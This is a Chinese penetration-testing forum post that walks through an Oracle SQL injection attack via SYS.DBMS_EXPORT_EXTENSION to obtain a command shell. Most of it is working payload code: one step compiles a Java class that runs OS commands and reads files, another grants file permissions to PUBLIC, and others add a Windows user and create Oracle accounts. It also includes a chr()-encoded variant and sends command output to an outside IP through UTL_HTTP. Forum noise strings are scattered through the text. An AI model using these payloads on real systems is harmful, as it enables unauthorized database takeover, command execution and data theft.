找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2999|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
% ~7 o5 m- b! D4 Z( x7 I+ N& W. F
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) / p" }* j+ ^, v, u5 E, C
的形式即可。(用" 'a'|| "是为了让语句返回true值)   j4 G$ x6 M! [5 r
语句有点长,可能要用post提交。 # s2 G! H8 `2 l
以下是各个步骤: 4 H- @5 m4 S' ?) J4 j3 P( J/ |/ e
1.创建包
) ?2 u7 o  u; z3 ~$ M* c: z通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:6 ~) I+ F; e% \  j* `2 w  [
/xxx.jsp?id=1 and '1'<>'a'||( & M" Z  D& ^9 _: ~2 Q. T0 H5 P4 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# ]) q9 m6 p# m* l0 h
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 s" Q% ^: t0 Dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}& S: g7 g: G# J- C8 X4 l" m; z) P
}'''';END;'';END;--','SYS',0,'1',0) from dual " a# ?- C: D3 b% E$ U+ l& Y( K' C
)
3 c# S7 O4 S# E; F: @: O) A------------------------
9 T# ]3 [# ~% g! t  D如果url有长度限制,可以把readFile()函数块去掉,即: + o+ t5 L2 r  f7 Q
/xxx.jsp?id=1 and '1'<>'a'||( 9 B$ T3 I( U$ f- ~3 h9 [) @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 H# n4 v7 n6 t8 jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 Y, e9 X! x' G9 b% [3 r; w# {' }
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 D/ v* ^5 L7 k. ~/ Z}'''';END;'';END;--','SYS',0,'1',0) from dual . k2 ]6 o1 B9 H- S5 l/ ~( X0 s: V
)
" f/ D3 J8 X4 d+ h* v2 l3 L同时把后面步骤 提到的 对readFile()的处理语句去掉。 , T- I& x, f8 u% N
------------------------------   j6 b: n! e6 f+ L  ]- u1 x0 {
2.赋Java权限
/ x. r8 }0 {0 s' Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
% R, X$ J6 k, @, ^: \& O) d3.创建函数 % K! @' B2 i' Q% G4 X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( B/ ~: j# _  \0 [create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual+ I9 ^! c0 e' W9 K) \( w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 V/ A6 L* Y5 y9 }) k6 j! u+ }
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual8 b, V3 m; f$ J
4.赋public执行函数的权限 . w$ z1 u# O$ g* G! [0 w2 g( Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! [4 x' @5 i0 |2 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual& R" I5 J( _/ j5 f, {! c+ ^
5.测试上面的几步是否成功 * i* R; g5 q, E" z1 X) `0 v
and '1'<>'11'||(
  T1 ~; t/ f' w3 I8 F; Xselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 2 E* z5 N+ W7 G+ L9 v
) % P( n* G& W2 q: X+ t* ?
and '1'<>( 6 v2 Q( V2 R/ _/ Y! d6 q- G$ S
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' * E# F, z" E' q
)
: V% _9 n$ p/ n% q' d& W6 E6.执行命令: 7 N9 J6 Y3 k+ W' p& j1 j
/xxx.jsp?id=1 and '1'<>( & j- _" T; F4 o- Y4 q9 i% q
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual & X& c2 I# {% e6 v, Y
) u5 I4 |8 K* V- e9 }
)
5 j7 M: }9 s/ W4 W1 h# l9 c  Q: ?: b/xxx.jsp?id=1 and '1'<>(
" M( r) o- P0 T! k/ b6 L( H1 c  F2 |select  sys.LinxReadFile('c:/boot.ini') from dual
$ e9 }- r- T, I7 v8 G, h: t7 B
& a6 v2 a4 a- I" i; y, ~' ])
$ ?$ S9 v6 p! \1 c* A1 Q  
/ M+ C# A) o" f' R8 @, N注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 & p3 h8 D' X, `! X# G) J. E
如果要查看运行结果可以用 union : 3 Z+ g: }4 `1 A8 V0 d2 J( N
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual; X+ L$ U. U% `
或者UTL_HTTP.request(: - ]1 j2 D3 O0 n( }
/xxx.jsp?id=1 and '1'<>( / }: r& F: f; t
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual" E0 l9 A5 D* x/ B% R' q
)
$ E6 v: e& |& J% x% c4 c/xxx.jsp?id=1 and '1'<>(
9 U, m2 s& E& m( S. t+ n0 s. \% x; ESELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
' ?2 \6 C5 D1 T7 R: Y8 Z2 M)
; U: \/ h9 C$ G" S2 k, W  M! J) k注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。2 f1 k5 [  [2 R& A; ?" j
-------------------- # k% W3 c; U% _
6.内部变化 4 P& Y( C5 ^( a% e' B) _
通过以下命令可以查看all_objects表达改变: 7 b' m1 N& D4 A' D2 I
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%': E/ I9 t8 F6 \, p  ~
7.删除我们创建的函数
9 Q6 J  O$ R" Y! }! N/ nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- _0 S8 G6 }3 Y9 @# ]  r2 M
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ; U  T4 n$ \& m& A7 F7 F
==================================================== 6 R& x9 A$ l3 _+ ?5 x# K" B, R/ [. T
全文结束。谨以此文赠与我的朋友。
+ A# `# s' t; B$ I* j. M0 ulinx
; \4 L9 E  L% x. G124829445 - B7 K" z6 V4 W  N7 G% z5 `( C2 E
2008.1.12 ! g1 ~  T5 Z4 |: E  f7 W$ H
linyujian@bjfu.edu.cn
1 Z7 Z/ \! X* C9 D' A6 ^======================================================================
4 U, T7 }' D- A' D4 o测试漏洞的另一方法:
7 P! ?6 R2 T/ A$ V8 V# w' ?; H( N创建oracle帐号: & V% w* E6 h/ s8 W
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 s* ~7 @. u* Y7 o& }& G& |" ~
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual6 ^$ j$ x! R$ h; z
即: ' I2 ?! \8 ~( c. c
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),7 r: M- m4 ~8 o3 X5 Z3 r
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual / i! U. E) k0 M$ _7 Y
确定漏洞存在: 3 E5 G# A( \7 M# ^6 n: C6 i, K
1<>( 1 S1 a* j2 M3 }7 ~8 a& Q
select user_id from all_users where username='LINXSQL' & U% f/ x# S# ~( r7 _
) " Z4 b) k3 _  C1 n3 [6 p' g8 T
给linxsql连接权限:
5 J0 e$ ?/ m2 W9 _% y, s4 h% Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 G. l  O  A$ Y2 S9 o; \
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: B* G# ]8 m! k5 }" |  V2 h& P4 k- k删除帐号:
9 J2 Q( _4 [: K# ]1 I2 y5 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' i4 M! A; ~) {4 h) vdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & \+ A1 h; y* e2 U5 S
======================
, P5 S/ e% j* m+ y" E  v; o1 v以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
; d% J& V) q2 |; N; U1.jsp?id=1 and '1'<>( % W9 ^* d1 ^* V. n8 H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 D  u: n7 C! G6 }$ ]( @create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual* `" U. }& [+ F& F4 [
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE) _5 X$ x! D3 ~* e$ X# ~" Z
 ), \2 X/ N9 c" W9 U" ]

4 H3 d* k% h1 K7 b+ f5 }& f2 o, [) z* G+ }8 U  T3 F
4 I3 J; J4 w4 t. L
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表